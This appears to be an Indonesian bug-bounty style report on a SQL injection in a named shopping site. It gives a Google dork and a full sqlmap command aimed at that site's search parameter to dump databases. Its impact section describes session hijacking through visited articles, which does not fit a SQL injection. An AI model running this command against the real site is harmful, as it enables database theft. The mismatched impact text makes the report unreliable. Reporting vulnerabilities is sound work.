Академический Документы
Профессиональный Документы
Культура Документы
Description
SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada
lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring
secara benar
Karena artikel dapat di akses publik, maka bug ini dapat berpengaruh kepada semua
pengguna dari domain tersebut. Selain itu, ini dapat digunakan untuk melakukan tindakan
terhadap administrator (atau setiap pengguna yang mengunjungi halaman tersebut) dan
berpotensi menyebabkan pembajakan sesi / token pengguna. Ini dapat terjadi oleh
pengguna yang mengunjungi artikel penyerang
Reproduction
1. Menggunakan Google Dorking ( inurl: brnd= site:geoff-max,com)
2. Menggunakan sqlmap untuk mendapatkan Database
Attack vector or Payload
Menggunakan sqlmap dengan parameter
sqlmap -u "https://geoff-
max.com/boys/search?idsrch=0&prodkat=1&ref=0&brnd=1*&txtcr=noble" --ignore-
redirects --random-agent --batch –dbs
END
Note:
Bersamaan dengan email yang saya kirim, saya juga melampirkan file format html untuk
ulasan lebih detailnya, tolong buka via mozilla dikarenakan chroome tidak bisa